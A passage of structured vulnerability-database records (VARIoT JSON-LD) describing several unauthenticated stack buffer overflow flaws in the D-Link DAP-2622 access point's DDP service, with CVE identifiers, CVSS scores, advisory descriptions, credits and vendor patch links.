"data": "D-Link DAP-2622 DDP Set Date-Time Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20084. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-35756"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"db": "CNVD",
"id": "CNVD-2025-29680"
},
{
"db": "VULMON",
"id": "CVE-2023-35756"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-35756",
"trust": 4.0
},
{
"db": "ZDI",
"id": "ZDI-23-1261",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028874",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20084",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29680",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-35756",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"db": "CNVD",
"id": "CNVD-2025-29680"
},
{
"db": "VULMON",
"id": "CVE-2023-35756"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"db": "NVD",
"id": "CVE-2023-35756"
}
]
},
"id": "VAR-202308-3321",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29680"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29680"
}
]
},
"last_update_date": "2025-12-19T22:28:22.859000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29680)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776441"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"db": "CNVD",
"id": "CNVD-2025-29680"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"db": "NVD",
"id": "CVE-2023-35756"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.9,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1261/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-35756"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-35756"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"db": "CNVD",
"id": "CNVD-2025-29680"
},
{
"db": "VULMON",
"id": "CVE-2023-35756"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"db": "NVD",
"id": "CVE-2023-35756"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"db": "CNVD",
"id": "CNVD-2025-29680"
},
{
"db": "VULMON",
"id": "CVE-2023-35756"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"db": "NVD",
"id": "CVE-2023-35756"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29680"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"date": "2024-05-03T02:15:40.390000",
"db": "NVD",
"id": "CVE-2023-35756"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29680"
},
{
"date": "2025-05-14T02:03:00",
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"date": "2025-05-13T13:55:36.973000",
"db": "NVD",
"id": "CVE-2023-35756"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028874"
}
],
"trust": 0.8
}
}
VAR-202308-3252
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set Device Info Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20087. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3252",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"db": "CNVD",
"id": "CNVD-2025-29681"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"db": "NVD",
"id": "CVE-2023-37310"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1264"
}
],
"trust": 0.7
},
"cve": "CVE-2023-37310",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29681",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37310",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37310",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37310",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-37310",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-37310",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-37310",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-37310",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29681",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"db": "CNVD",
"id": "CNVD-2025-29681"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"db": "NVD",
"id": "CVE-2023-37310"
},
{
"db": "NVD",
"id": "CVE-2023-37310"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-2622 DDP Set Device Info Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20087. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37310"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"db": "CNVD",
"id": "CNVD-2025-29681"
},
{
"db": "VULMON",
"id": "CVE-2023-37310"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-37310",
"trust": 4.0
},
{
"db": "ZDI",
"id": "ZDI-23-1264",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028922",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20087",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29681",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-37310",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"db": "CNVD",
"id": "CNVD-2025-29681"
},
{
"db": "VULMON",
"id": "CVE-2023-37310"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"db": "NVD",
"id": "CVE-2023-37310"
}
]
},
"id": "VAR-202308-3252",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29681"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29681"
}
]
},
"last_update_date": "2025-12-19T22:28:22.818000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29681)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776446"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"db": "CNVD",
"id": "CNVD-2025-29681"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"db": "NVD",
"id": "CVE-2023-37310"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.9,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1264/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37310"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-37310"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"db": "CNVD",
"id": "CNVD-2025-29681"
},
{
"db": "VULMON",
"id": "CVE-2023-37310"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"db": "NVD",
"id": "CVE-2023-37310"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"db": "CNVD",
"id": "CNVD-2025-29681"
},
{
"db": "VULMON",
"id": "CVE-2023-37310"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"db": "NVD",
"id": "CVE-2023-37310"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29681"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"date": "2024-05-03T02:15:40.560000",
"db": "NVD",
"id": "CVE-2023-37310"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1264"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29681"
},
{
"date": "2025-05-14T12:43:00",
"db": "JVNDB",
"id": "JVNDB-2023-028922"
},
{
"date": "2025-05-13T13:55:39.837000",
"db": "NVD",
"id": "CVE-2023-37310"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028922"
}
],
"trust": 0.8
}
}
VAR-202308-3358
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set IPv6 Address Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20092. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3358",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"db": "CNVD",
"id": "CNVD-2025-29684"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"db": "NVD",
"id": "CVE-2023-37314"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1268"
}
],
"trust": 0.7
},
"cve": "CVE-2023-37314",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29684",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37314",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37314",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37314",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-37314",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-37314",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-37314",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-37314",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29684",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1268"
},
{
"db": "CNVD",
"id": "CNVD-2025-29684"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028872"
},
{
"db": "NVD",
"id": "CVE-2023-37314"
},
{
"db": "NVD",
"id": "CVE-2023-37314"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
